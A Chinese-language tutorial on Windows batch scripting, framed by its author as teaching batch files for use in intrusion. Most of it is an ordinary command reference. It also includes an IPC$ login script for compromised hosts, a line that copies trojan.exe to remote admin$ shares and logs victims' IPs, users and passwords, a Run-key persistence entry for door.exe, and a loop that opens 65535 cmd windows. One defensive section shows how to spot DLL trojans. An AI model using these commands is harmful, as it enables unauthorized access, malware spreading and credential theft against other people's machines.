windows bat腳本編寫

windows批處理 (cmd/bat) 編程詳解

    開始之前先簡單說明下cmd文件和bat文件的區別:在本質上兩者沒有區別,都是簡單的文本編碼方式,都可以用記事本創建、編輯和查看。兩者所用的命令行代碼也是共用的,只是cmd文件中允許使用的命令要比bat文件多。cmd文件只有在windows2000以上的系統中才能運行,而bat文件則沒有這個限制。從它們的文件描述中也可以看出以上的區別:cmd文件的描述是“windows nt命令腳本”, bat文件的描述是“ms dos批處理文件”

 

    如果沒有一定的相關知識恐怕不容易看懂和理解批處理文件,也就更談不上自己動手編寫了.批處理文件是無格式的文本文件,它包含一條或多條命令。它的文件擴展名爲 .bat 或 .cmd。在命令提示下鍵入批處理文件的名稱,或者雙擊該批處理文件,系統就會調用cmd.exe按照該文件中各個命令出現的順序來逐個運行它們。使用批處理文件(也被稱爲批處理程序或腳本),可以簡化日常或重複性任務。當然我們的這個版本的主要內容是介紹批處理在入侵中一些實際運用,例如我們後面要提到的用批處理文件來給系統打補丁、批量植入後門程序等。下面就開始我們批處理學習之旅吧。

 

1.  簡單批處理內部命令簡介

1)   echo 命令

       打開回顯或關閉請求回顯功能,或顯示消息。如果沒有任何參數,echo 命令將顯示當前回顯設置。
語法
echo [{ on|off }] [message]
Sample 1 :

       @echooff

       echohello world

Sample 2 :

@echo off

echo 1

echo.

echo 2

echo on

echo 3

pause

在實際應用中我們會把這條命令和重定向符號(也稱爲管道符號,一般用> >> ^)結合來實現輸入一些命令到特定格式的文件中.這將在以後的例子中體現出來。

c:\>dir *.txt > 1.txt

c:\>dir *.txt >> 1.txt

2)   @ 命令

    表示不顯示@後面的命令,在入侵過程中(例如使用批處理來格式化敵人的硬盤)自然不能讓對方看到你使用的命令啦。
Sample:@echo off
 

3)   goto 命令

指定跳轉到標籤,找到標籤後,程序將處理從下一行開始的命令。
語法:goto label (label是參數,指定所要轉向的批處理程序中的行。)
Sample:
if { %1 }=={ } goto noparms
if { %2 }=={ } goto noparms(如果這裏的if、%1、%2你不明白的話,先跳過去,後面會有詳細的解釋。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
標籤的名字可以隨便起,但是最好是有意義的字母啦,字母前加個:用來表示這個字母是標籤,goto命令就是根據這個:來尋找下一步跳到到那裏。最好有一些說明這樣你別人看起來纔會理解你的意圖啊。

4)   rem 命令

註釋命令,在C語言中相當與/*--------*/,它並不會被執行,只是起一個註釋的作用,便於別人閱讀和你自己日後修改。
Rem Message
Sample:@Rem Here is the description.

5) pause 命令

運行 Pause 命令時,將顯示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\\back
echo Please put a new disk into driver A
pause
goto begin
在這個例子中,驅動器 A 中磁盤上的所有文件均複製到d:\\back中。顯示的註釋提示您將另一張磁盤放入驅動器 A 時,pause 命令會使程序掛起,以便您更換磁盤,然後按任意鍵繼續處理。

6) call 命令

從一個批處理程序調用另一個批處理程序,並且不終止父批處理程序。call 命令接受用作調用目標的標籤。如果在腳本或批處理文件外使用 call,它將不會在命令行起作用

語法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
參數
[Drive: }[Path] FileName
指定要調用的批處理程序的位置和名稱。filename 參數必須具有 .bat 或 .cmd 擴展名。

7) start 命令

Start

啓動單獨的“命令提示符”窗口來運行指定程序或命令。如果在沒有參數的情況下使用,start 將打開第二個命令提示符窗口。

 

語法

start ["title"] [/dPath] [/min] [/max] [{/separate |/shared}] [{/low | /normal | /high | /realtime | /abovenormal | belownormal}][/wait] [/B] [FileName] [parameters]

 

參數

"title" 指定在“命令提示符”窗口標題欄中顯示的標題。

/dpatch 指定啓動目錄。

/i 將 Cmd.exe 啓動環境傳送到新的“命令提示符”窗口。

/min 啓動新的最小化窗口。

/max 啓動新的最大化窗口。

/separate 在單獨的內存空間啓動 16 位程序。

/shared 在共享的內存空間啓動 16 位程序。

/low 以空閒優先級啓動應用程序。

/normal 以一般優先級啓動應用程序。

/high 以高優先級啓動應用程序。

/realtime 以實時優先級啓動應用程序。

/abovenormal 以超出常規優先級的方式啓動應用程序。

/belownormal 以低出常規優先級的方式啓動應用程序。

/wait 啓動應用程序,並等待其結束。

/b 啓動應用程序時不必打開新的“命令提示符”窗口。除非應用程序啓用 CTRL+C,否則將忽略 CTRL+C 操作。使用 CTRL+BREAK 中斷應用程序。

非執行文件只要將文件名作爲命令鍵入,即可通過其文件關聯運行該文件。有關使用 assoc 和 ftype 在命令腳本中創建這些關聯的詳細信息,請參閱“”。

在運行的命令的第一個標記爲“CMD”字符串但不包括擴展名或路徑限定符時,“CMD”將被 COMSPEC 變量的值取代。這樣可以防止用戶從當前目錄選取 cmd。

當您運行 32 位圖形用戶界面 (GUI) 應用程序時,cmd 不會在返回到命令提示符之前等待應用程序退出。如果從命令腳本運行應用程序,則不會發生這種新情況。在運行的命令中第一個符號不包括擴展名的情況下,Cmd.exe 使用 PATHEXT 環境變量的值確定要查找的擴展名以及查找順序。PATHEXT 變量的默認值爲:COM;.EXE;.BAT;.CMD(語法與 PATH 變量相同,使用分號分開不同元素)。當您搜索可執行文件且在任何擴展名上都沒有匹配項時,start 將搜索目錄名。

 

具體例子:

說明:如果你所在程序的路徑中帶有空格,那麼必須用“”把路徑括起來,否則系統會提示找不到XX文件,另外,在運行某些程序時,需在路徑的前面加一對空白的“”,表示創建一個空白的窗口,它指向的程序是XXXXXXXX。還有就是別忘了空格。

 

當我想運行位於“D:\draw\”的“photoshop.exe”使,應該使用以下命令:

start “”“D:\draw\photoshop.exe” 表示以常規窗口運行程序

 

如果想讓程序以最大化窗口運行,則使用以下命令:

 

start /max“”“D:\draw\photoshop.exe” 表示以最大化窗口運行程序

 

最小化這是這樣:

 

start /min "" "D:\draw\photoshop.exe" 表示以最小化窗口運行程序

 

等待某個程序允許完畢,也就是窗口關閉後,再打開下一個程序這可以這樣:

 

start /w "" "D:\draw\photoshop.exe"

start "" cmd.exe

 

start /min “” “e:\t.cmd”

8) choice 命令

choice 使用此命令可以讓用戶輸入一個字符,從而運行不同的命令。使用時應該加/c:參數,c:後應寫提示可輸入的字符,之間無空格。它的返回碼爲1234……
如: choice /c:dme defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的內容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (應先判斷數值最高的錯誤碼)
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\\dos\\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件運行後,將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ,然後if語句將作出判斷,d表示執行標號爲defrag的程序段,m表示執行標號爲mem的程序段,e表示執行標號爲end的程序段,每個程序段最後都以goto end將程序跳到end標號處,然後程序將顯示good bye,文件結束。

 

9) If 命令

if 表示將判斷是否符合規定的條件,從而決定執行不同的命令。 有三種格式:
1、if "參數" == "字符串"  待執行的命令
參數如果等於指定的字符串,則條件成立,運行命令,否則運行下一句。(注意是兩個等號)
如if "%1"=="a" format a:
if { %1 }=={ } goto noparms
if { %2 }=={ } goto noparms

2、if exist 文件名  待執行的命令
如果有指定的文件,則條件成立,運行命令,否則運行下一句

如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 數字  待執行的命令
如果返回碼等於指定的數字,則條件成立,運行命令,否則運行下一句。
如if errorlevel 2 goto x2  
DOS程序運行時都會返回一個數字給DOS,稱爲錯誤碼errorlevel或稱返回碼,常見的返回碼爲0、1。

10)for 命令

FOR這條命令基本上都被用來處理文本,但還有其他一些好用的功能!

看看他的基本格式(這裏我引用的是批處理中的格式,直接在命令行只需要一個%號) 
FOR 參數 %%變量名 IN (相關文件或命令) DO 執行的命令

參數:FOR有4個參數 /d   /l   /r   /f   他們的作用我在下面用例子解釋 
%%變量名 :這個變量名可以是小寫a-z或者大寫A-Z,他們區分大小寫,FOR會把每個讀取到的值給他; 
IN:命令的格式,照寫就是了; 
(相關文件或命令) :FOR要把什麼東西讀取然後賦值給變量,看下面的例子 
do:命令的格式,照寫就是了! 
執行的命令:對每個變量的值要執行什麼操作就寫在這.

可以在CMD輸入for /?看系統提供的幫助!對照一下 
FOR %%variable IN (set) DO command [command-parameters]

%%variable 指定一個單一字母可替換的參數。 
(set)      指定一個或一組文件。可以使用通配符。 
command    指定對每個文件執行的命令。 
command-parameters 
             爲特定命令指定參數或命令行開關。


現在開始講每個參數的意思

/d 
僅爲目錄 
如果 Set (也就是我上面寫的 "相關文件或命令") 包含通配符(* 和 ?),將對與 Set 相匹配的每個目

錄(而不是指定目錄中的文件組)執行指定的 Command。

系統幫助的格式:FOR /D%%variable IN (set) DO command 
他主要用於目錄搜索,不會搜索文件,看這樣的例子

@echo off 
for /d %%i in (*) do @echo %%i 
pause

把他保存放在C盤根目錄執行,就會把C盤目錄下的全部目錄名字打印出來,而文件名字一個也不顯示! 
在來一個,比如我們要把當前路徑下文件夾的名字只有1-3個字母的打出來

@echo off 
for /d %%i in (???) do @echo %%i 
pause

這樣的話如果你當前目錄下有目錄名字只有1-3個字母的,就會顯示出來,沒有就不顯示了


思考題目:

@echo off 
for /d %%i in (window?) do @echo %%i 
pause

保存到C盤下執行,會顯示什麼呢?自己看吧! 
/D參數只能顯示當前目錄下的目錄名字,這個大家要注意!

/R 
遞歸 
進入根目錄樹[Drive:]Path,在樹的每個目錄中執行for 語句。如果在 /R 後沒有指定目錄,則認爲是

當前目錄。如果 Set 只是一個句點 (.),則只枚舉目錄樹。 
系統幫助的格式:FOR /R[[drive:]path] %%variable IN (set) DO command

上面我們知道,/D只能顯示當前路徑下的目錄名字,那麼現在這個/R也是和目錄有關,他能幹嘛呢?放心他比

/D強大多了! 
他可以把當前或者你指定路徑下的文件名字全部讀取,注意是文件名字,有什麼用看例子!

@echo off 
for /r c:\ %%i in (*.exe) do @echo %%i 
pause

咋們把這個BAT保存到D盤隨便哪裏然後執行,我會就會看到,他把C盤根目錄,和每個目錄的子目錄下面全部

的EXE文件都列出來了,這裏的c:\就是目錄了。

再來一個 
@echo off 
for /r %%i in (*.exe) do @echo %%i 
pause

參數不一樣了,這個命令前面沒加那個C:\也就是搜索路徑,這樣他就會以當前目錄爲搜索路徑,比如你這

個BAT你把他防災d:\test目錄下執行,那麼他就會把D:\test目錄和他下面的子目錄的全部EXE文件列出

來!!!


/L 
迭代數值範圍 
使用迭代變量設置起始值(Start#),然後逐步執行一組範圍的值,直到該值超過所設置的終止值 (End#)

。/L 將通過對 Start# 與 End# 進行比較來執行迭代變量。如果 Start# 小於 End#,就會執行該命令。

如果迭代變量超過 End#,則命令解釋程序退出此循環。還可以使用負的 Step# 以遞減數值的方式逐步執

行此範圍內的值。例如,(1,1,5)生成序列 1 2 3 4 5,而 (5,-1,1) 則生成序列 (5 4 3 2 1)。語法是:

系統幫助的格式:for /L%% Variable in (Start#,Step#,End#) do Command

例如:

@echo off 
for /l %%i in (1,1,5) do @echo %%i 
pause

保存執行看效果,他會打印從1 2 3 4 5 這樣5個數字 
(1,1,5)這個參數也就是表示從1開始每次加1直到5終止!

再看這個例子 
@echo off 
for /l %%i in (1,1,5) do start cmd 
pause

執行後是不是嚇了一跳,怎麼多了5個CMD窗口,呵呵!如果把那個 (1,1,5)改成 (1,1,65535)會有什麼結果,

我先告訴大家,會打開65535個CMD窗口....這麼多你不死機算你強!

當然我們也可以把那個startcmd改成md %%i 這樣就會建立指定個目錄了!!!名字爲1-65535

看完這個被我賦予破壞性質的參數後,我們來看最後一個參數

/f

含有/F的for詳細說明

含有/F的for有很大的用處,在批處理中使用的最多,用法如下:
格式: 
FOR /F ["options"] %%i IN (file) DOcommand

FOR/F ["options"] %%i IN ("string") DO command

FOR/F ["options"] %%i IN ('command') DO command

這個可能是最常用的,也是最強的命令,主要用來處理文件和一些命令的輸出結果。

file代表一個或多個文件

string 代表字符串

command代表命令

["options"]可選

對於FOR /F %%i IN (file) DO command

file爲文件名,按照官方的說法是,for會依次將file中的文件打開,並且在進行到下一個文件之前將每個文件讀取到內存,按照每一行分成一個一個的元素,忽略空白的行,看個例子。

假如文件a.txt中有如下內容:

第1行第1列第1行第2列第1行第3列
第2行第1列第2行第2列第2行第3列
第3行第1列第3行第2列第3行第3列

你想顯示a.txt中的內容,會用什麼命令呢?當然是type,type a.txt

for也可以完成同樣的命令:

for /f %%i in(a.txt) do echo %%i

還是先從括號執行,因爲含有參數/f,所以for會先打開a.txt,然後讀出a.txt裏面的所有內容,把它作爲一個集合,並且以每一行作爲一個元素,所以會產生這樣的集合,

{"第1行第1列第1行第2列第1行第3列", //第一個元素

"第2行第1列第2行第2列第2行第3列", //第二個元素

"第3行第1列第3行第2列第3行第3列"}   //第三個元素

集合中只有3個元素,同樣用%%i依次代替每個元素,然後執行do後面的命令。

具體過程:

用%%i代替"第1行第1列第1行第2列第1行第3列",執行do後面的echo %%i,顯示"第1行第1列第1行第2列第1行第3列",

用%%i代替"第2行第1列第2行第2列第2行第3列",執行echo %%i,顯示"第2行第1列第2行第2列第2行第3列",

依次,直到每個元素都代替完爲止。

爲了加強理解/f的作用,請執行一下兩個命令,對比即可明白:

for/f %%i in (a.txt) do echo %%i //這個會顯示a.txt裏面的內容,因爲/f的作用,會讀出a.txt中
的內容。

for%%i in (a.txt) do echo %%i //而這個只會顯示a.txt這個名字,並不會讀取其中的內容。

通過上面的學習,我們發現for /f會默認以每一行來作爲一個元素,但是如果我們還想把每一行再分解更小的內容,該怎麼辦呢?不用擔心,for命令還爲我們提供了更詳細的參數,使我們將每一行分爲更小的元素成爲可能。

它們就是:delims和tokens

delims 用來告訴for每一行應該拿什麼作爲分隔符,默認的分隔符是空格和tab鍵

比如,還是上面的文件,我們執行下面的命令:

for/f "delims= " %%i in (a.txt) do echo %%i

顯示的結果是:

第1行第1列
第2行第1列
第3行第1列

爲什麼是這樣的呢。因爲這裏有了delims這個參數,=後面有一個空格,意思是再將每個元素以空格分割,默認是隻取分割之後的第一個元素。

執行過程是:

將第一個元素"第1行第1列第1行第2列第1行第3列"分成三個元素:"第1行第1列" "第1行第2列" "第1行第3列",它默認只取第一個,即"第1行第1列",然後執行do後面的命令,依次類推。

但是這樣還是有侷限的,如果我們想要每一行的第二列元素,那又如何呢?

這時候,tokens跳出來說,我能做到。

它的作用就是當你通過delims將每一行分爲更小的元素時,由它來控制要取哪一個或哪幾個。

還是上面的例子,執行如下命令:

for/f "tokens=2 delims= " %%i in (a.txt) do echo %%i

執行結果:

第1行第2列
第2行第2列
第3行第2列

如果要顯示第三列,那就換成tokens=3。

同時tokens支持通配符*,以及限定範圍。

如果要顯示第二列和第三列,則換成tokens=2,3或tokens=2-3,如果還有更多的則爲:tokens=2-10之類的。

此時的命令爲:

for/f "tokens=2,3 delims= " %%i in (a.txt) do echo %%i %%j

怎麼多出一個%%j?

這是因爲你的tokens後面要取每一行的兩列,用%%i來替換第二列,用%%j來替換第三列。

並且必須是按照英文字母順序排列的,%%j不能換成%%k,因爲i後面是j

執行結果爲:

第1行第2列第1行第3列
第2行第2列第2行第3列
第3行第2列第3行第3列

對以通配符*,就是把這一行全部或者這一行的剩餘部分當作一個元素了。

比如:

for/f "tokens=* delims= " %%i in (a.txt) do echo %%i

執行結果爲:

第1行第1列第1行第2列第1行第3列
第2行第1列第2行第2列第2行第3列
第3行第1列第3行第2列第3行第3列

其實就跟for /f %%i in (a.txt) do echo %%i的執行結果是一樣的。

再如:

for/f "tokens=2,* delims= " %%i in (a.txt) do echo %%i %%j

執行結果爲:

第1行第2列第1行第3列
第2行第2列第2行第3列
第3行第2列第3行第3列

用%%i代替第二列,用%%j代替剩餘的所有

最後還有skip合eol,這倆個簡單,skip就是要忽略文件的前多少行,而eol用來指定當一行以什麼符號開始時,就忽略它。

比如:

for/f "skip=2 tokens=*" %%i in (a.txt) do echo %%i

結果爲:

第3行第1列第3行第2列第3行第3列

用skip來告訴for跳過前兩行。

如果不加tokens=*的話,執行結果爲:

第3行第1列

不知道怎麼回事。

再如,當a.txt內容變成:

.第1行第1列第1行第2列第1行第3列
.第2行第1列第2行第2列第2行第3列
第3行第1列第3行第2列第3行第3列

執行for /f "eol=. tokens=*"%%i in (a.txt) do echo %%i結果是:

第3行第1列第3行第2列第3行第3列

用eol來告訴for忽略以"."開頭的行。

同樣也必須加tokens=*,否則只會顯示"第3行第1列"

2.  如何在批處理文件中使用參數

批處理中可以使用參數,一般從1%到 9%這九個,當有多個參數時需要用shift來移動,這種情況並不多見,我們就不考慮它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
這個例子用於連續地格式化幾張軟盤,所以用的時候需在dos窗口輸入fomat.bata,呵呵,好像有點畫蛇添足了~^_^
 

sample2:
當我們要建立一個IPC$連接地時候總要輸入一大串命令,弄不好就打錯了,所以我們不如把一些固定命令寫入一個批處理,把肉雞地ip password username 當着參數來賦給這個批處理,這樣就不用每次都打命令了。
@echo off
@net use \\\\1%\\ipc$ "2%" /u:"3%" 注意哦,這裏PASSWORD是第二個參數。
@if errorlevel 1 echo connection failed
怎麼樣,使用參數還是比較簡單的吧?你這麼帥一定學會了^_^.
 

3.  如何使用組合命令(Compound Command)

1.&

Usage:第一條命令 & 第二條命令 [& 第三條命令...]

用這種方法可以同時執行多條命令,而不管命令是否執行成功

Sample:
C:\\>dir z: & dir c:\\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\\Ex4rc

2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif

2.&&

Usage:第一條命令 && 第二條命令[&& 第三條命令...]

用這種方法可以同時執行多條命令,當碰到執行出錯的命令後將不執行後面的命令,如果一直沒有出錯則一直執行完所有命令;

Sample:
C:\\>dir z: && dir c:\\Ex4rch
The system cannot find the path specified.

C:\\>dir c:\\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\\Ex4rch

2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

在做備份的時候可能會用到這種命令會比較簡單,如:
dir file://192.168.0.1/database/backup.mdb&& copy file://192.168.0.1/database/backup.mdbE:\\backup
如果遠程服務器上存在backup.mdb文件,就執行copy命令,若不存在該文件則不執行copy命令。這種用法可以替換IF exist了 :)

3.||

Usage:第一條命令 || 第二條命令 [|| 第三條命令...]

用這種方法可以同時執行多條命令,當碰到執行正確的命令後將不執行後面的命令,如果沒有出現正確的命令則一直執行完所有命令;

Sample:
C:\\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C:\\Ex4rch

2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

組合命令使用的例子:
sample:
@copy trojan.exe \\\\%1\\admin$\\system32 && if not errorlevel 1 echoIP %1 USER %2 PASS %3 >>victim.txt

4.  管道命令的使用

1. | 命令

Usage:第一條命令 | 第二條命令 [| 第三條命令...]
將第一條命令的結果作爲第二條命令的參數來使用,記得在unix中這種方式很常見。

sample:
time /t>>D:\\IP.log
netstat -n -p tcp|find ":3389">>D:\\IP.log
start Explore


看出來了麼?用於終端服務允許我們爲用戶自定義起始的程序,來實現讓用戶運行下面這個bat,以獲得登錄用戶的IP。

 

2. >、>>輸出重定向命令

將一條命令或某個程序輸出結果的重定向到特定文件中, > 與 >>的區別在於,>會清除調原有文件中的內容後寫入指定文件,而>>只會追加內容到指定文件中,而不會改動其中的內容。

sample1:
echo hello world>c:\\hello.txt (stupid example?)

sample2:
時下DLL木馬盛行,我們知道system32是個捉迷藏的好地方,許多木馬都削尖了腦袋往那裏鑽,DLL馬也不例外,針對這一點我們可以在安裝好系統和必要的應用程序後,對該目錄下的EXE和DLL文件作一個記錄:
運行CMD--轉換目錄到system32--dir*.exe>exeback.txt & dir *.dll>dllback.txt,
這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中,
日後如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了.
這時我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然後運行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txtdllback1.txt>diff.txt.(用FC命令比較前後兩次的DLL和EXE文件,並將結果輸入到diff.txt中),這樣我們就能發現一些多出來的DLL和EXE文件,然後通過查看創建時間、版本、是否經過壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒有是最好,如果有的話也不要直接DEL掉,先用regsvr32 /u trojan.dll將後門DLL文件註銷掉,再把它移到回收站裏,若系統沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。

3. < 、>& 、<&

< 從文件中而不是從鍵盤中讀入命令輸入。
>& 將一個句柄的輸出寫入到另一個句柄的輸入中。
<& 從一個句柄讀取輸入並將其寫入到另一個句柄輸出中。
這些並不常用,也就不多做介紹。

 

5.  如何用批處理文件來操作註冊表

在入侵過程中經常會操作註冊表的特定的鍵值來實現一定的目的,例如:爲了達到隱藏後門、木馬程序而刪除Run下殘餘的鍵值。或者創建一個服務用以加載後門。當然我們也會修改註冊表來加固系統或者改變系統的某個屬性,這些都需要我們對註冊表操作有一定的瞭解。下面我們就先學習一下如何使用.REG文件來操作註冊表.(我們可以用批處理來生成一個REG文件)
關於註冊表的操作,常見的是創建、修改、刪除

1).創建

創建分爲兩種,一種是創建子項(Subkey)

我們創建一個文件,內容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\hacker]

然後執行該腳本,你就已經在HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft下創建了一個名字爲“hacker”的子項。

另一種是創建一個項目名稱
那這種文件格式就是典型的文件格式,和你從註冊表中導出的文件格式一致,內容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
"Invader"="Ex4rch"
"Door"=C:\\\\WINNT\\\\system32\\\\door.exe
"Autodos"=dword:02

這樣就在[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]下
新建了:Invader、door、about這三個項目
Invader的類型是“String Value”
door的類型是“REG SZ Value”
Autodos的類型是“DWORD Value”

2).修改

修改相對來說比較簡單,只要把你需要修改的項目導出,然後用記事本進行修改,然後導入(regedit /s)即可。

 

3).刪除

我們首先來說說刪除一個項目名稱,我們創建一個如下的文件:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
"Ex4rch"=-

執行該腳本,[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]下的"Ex4rch"就被刪除了;

 

附1: WIN2000下的9個批處理命令

批處理文件是將一系列命令按一定的順序集合爲一個可執行的文本文件,其擴展名爲BAT。

1)   REM

REM 是個註釋命令一般是用來給程序加上註解的,該命令後的內容在程序執行的時候將不會被顯示和執行。例: 
REM 你現在看到的就是註解,這一句將不會被執行。在以後的例子中解釋的內容都REM 會放在REM後面。請大家注意。

2)   ECHO

ECHO 是一個回顯命令主要參數有OFF和 ON,一般用ECHO message來顯示一個特定的消息 。例: 
Echo off 
Rem 以上代表關閉回顯即不顯示所執行的命令 
Echo 這個就是消息。 
Rem 以上代表顯示"這就是消息"這列字符 
執行結果: 
C:\>ECHO.BAT 
這個就是消息。

3)   GOTO

GOTO 即爲跳轉的意思。在批處理中允許以":XXX"來構建一個標號然後用GOTO :標號直接來執行標號後的命令。例 
:LABEL 
REM 上面就是名爲LABEL的標號。 
DIR C:\ 
DIR D:\ 
GOTO LABEL 
REM 以上程序跳轉標號LABEL處繼續執行。

4)   CALL

CALL 命令可以在批處理執行過程中調用另一個批處理,當另一個批處理執行完後再繼續執行原來的批處理。例: 
批處理2.BAT內容如下: 
ECHO 這就是2的內容 
批處理1.BAT內容如下: 
ECHO 這是1的內容 
CALL 2.BAT 
ECHO 1和2的內容全部顯示完成 
執行結果如下: 
C:\>1.BAT 
這是1的內容 
這就是2的內容 
1和2的內容全部顯示完成

5)   PAUSE

PAUSE 停止系統命令的執行並顯示下面的內容。例: 
C:\> PAUSE 
請按任意鍵繼續 . . .

6)   IF

IF 條件判斷語句,語法格式如下: 
IF [NOT] ERRORLEVEL number command 
IF [NOT] string1==string2 command 
IF [NOT] EXIST filename command 
說明: 
[NOT] 將返回的結果取反值即"如果沒有"的意思。 
ERRORLEVEL 是命令執行完成後返回的退出值 
Number 退出值的數字取值範圍0~255。判斷時值的排列順序應該又大到小。返回的值大於或等於指定的值時條件成立。 
string1==string2 string1和string2都爲字符的數據,英文字符的大小寫將看做不同,這個條件中的等於號必須是2個(絕對相等),條件想等後即執行後面的 command
EXIST filename 爲文件或目錄存在的意思。 
IF ERRORLEVEL這條語句必須放在某一個命令後面。執行命令後由IF ERRORLEVEL來判斷命令的返回值。 
例: 
1、 IF [NOT] ERRORLEVEL number command 
檢測命令執行完後的返回值做出判斷。 
echo off 
dir z: 
rem 如果退出代碼爲1(不成功)就跳至標題1處執行 
IF ERRORLEVEL 1 goto 1 
rem 如果退出代碼爲0(成功)就跳至標題0處執行 
IF ERRORLEVEL 0 goto 0 
:0 
echo 命令執行成功! 
Rem 程序執行完畢跳至標題exit處退出 
goto exit 
:1 
echo 命令執行失敗! 
Rem 程序執行完畢跳至標題exit處退出 
goto exit 
:exit 
Rem 這裏是程序的出口 
2、 IF string1==string2 command 
檢測當前變量的值做出判斷 
ECHO OFF 
IF %1==2 goto no 
Echo 變量相等! 
Goto exit 
:no 
echo 變量不相等 
goto exit 
:exit 
大家可以這樣看效果 C:\>test.bat 數字

3、 IF [NOT] EXIST filename command 
發現特定的文件做出判斷 
echo off 
IF not EXIST autoexec.bat goto 1 
echo 文件存在成功! 
goto exit 
:1 
echo 文件不存在失敗! 
goto exit 
:exit 
這個批處理大家可以放在c盤和d盤分別執行看看效果。

7)   FOR

FOR這個命令比較特殊是一個循環執行命令的命令,同時FOR的循環裏面還可以套用FOR在進行循環。這篇我們介紹基本的用法就不做套用的循環了,後面再來講解套用的循環。在批處理中FOR的命令如下:
FOR [%%c] IN (set) DO [command] [arguments] 
在命令行中命令如下: 
FOR [%c] IN (set) DO [command] [arguments] 
常用參數: 
/L 該集表示以增量形式從開始到結束的一個數字序列。因此,(1,1,5) 將產生序列 1 2 3 4 5,(5,-1,1) 將產生序列 (5 4 3 2 1)。 
/D 如果集中包含通配符,則指定與目錄名匹配,而不與文件名匹配。

/F 從指定的文件中讀取數據作爲變量 
eol=c - 指一個行註釋字符的結尾(就一個) 
skip=n - 指在文件開始時忽略的行數。 
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認分隔符集。 
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變量名稱的分配。m-n格式爲一個範圍。通過 nth 符號指定 mth。如果符號字符串中的最後一個字符星號,那麼額外的變量將在最後一個符號解析之後分配並接受行的保留文本。
usebackq - 指定新語法已在下類情況中使用:在作爲命令執行一個後引號的字符串並且一個單引號字符爲文字字符串命令並允許在 filenameset中使用雙引號擴起文件名稱。
下面來看一個例子: 
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i%j %k 
會分析 myfile.txt 中的每一行,忽略以分號打頭的那些行,將每行中的第二個和第三個符號傳遞給 for 程序體;用逗號和/或空格定界符號。請注意,這個 for 程序體的語句引用 %i 來取得第二個符號,引用 %j 來取得第三個符號,引用 %k來取得第三個符號後的所有剩餘符號。對於帶有空格的文件名,您需要用雙引號將文件名括起來。爲了用這種方式來使用雙引號,您還需要使用 usebackq 選項,否則,雙引號會被理解成是用作定義某個要分析的字符串的。
%i 專門在 for 語句中得到說明,%j 和 %k 是通過tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號,只要不試圖說明一個高於字母 'z' 或'Z' 的變量。請記住,FOR變量名分大小寫,是通用的;而且,同時不能有 52 個以上都在使用中。
您還可以在相鄰字符串上使用 FOR /F 分析邏輯;方法是,用單引號將括號之間的 filenameset 括起來。這樣,該字符串會被當作一個文件中的一個單一輸入行。最後,您可以用 FOR /F 命令來分析命令的輸出。方法是,將括號之間的 filenameset 變成一個反括字符串。該字符串會被當作命令行,傳遞到一個子 CMD.EXE,其輸出會被抓進內存,並被當作文件分析。因此,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 
會枚舉當前環境中的環境變量名稱。 
以下列舉一個簡單的例子,他將說明參數/L和沒有參數的區別: 
刪除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT 
例: 
ECHO OFF 
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT 
或 
FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT 
以上2條命令執行的結果都是一樣的如下: 
C:\>DEL 1.TXT 
C:\>DEL 2.TXT 
C:\>DEL 3.TXT 
C:\>DEL 4.TXT 
C:\>DEL 5.TXT

8)   SETLOCAL

開始批處理文件中環境改動的本地化操作。在執行 SETLOCAL 之後 
所做的環境改動只限於批處理文件。要還原原先的設置,必須執 
行 ENDLOCAL。 達到批處理文件結尾時,對於該批處理文件的每個 
尚未執行的 SETLOCAL 命令,都會有一個隱含的ENDLOCAL 被 
執行。例: 
@ECHO OFF 
SET PATH /*察看環境變量PATH 
PAUSE 
SETLOCAL 
SET PATH=E:\TOOLS /*重新設置環境變量PATH 
SET PATH 
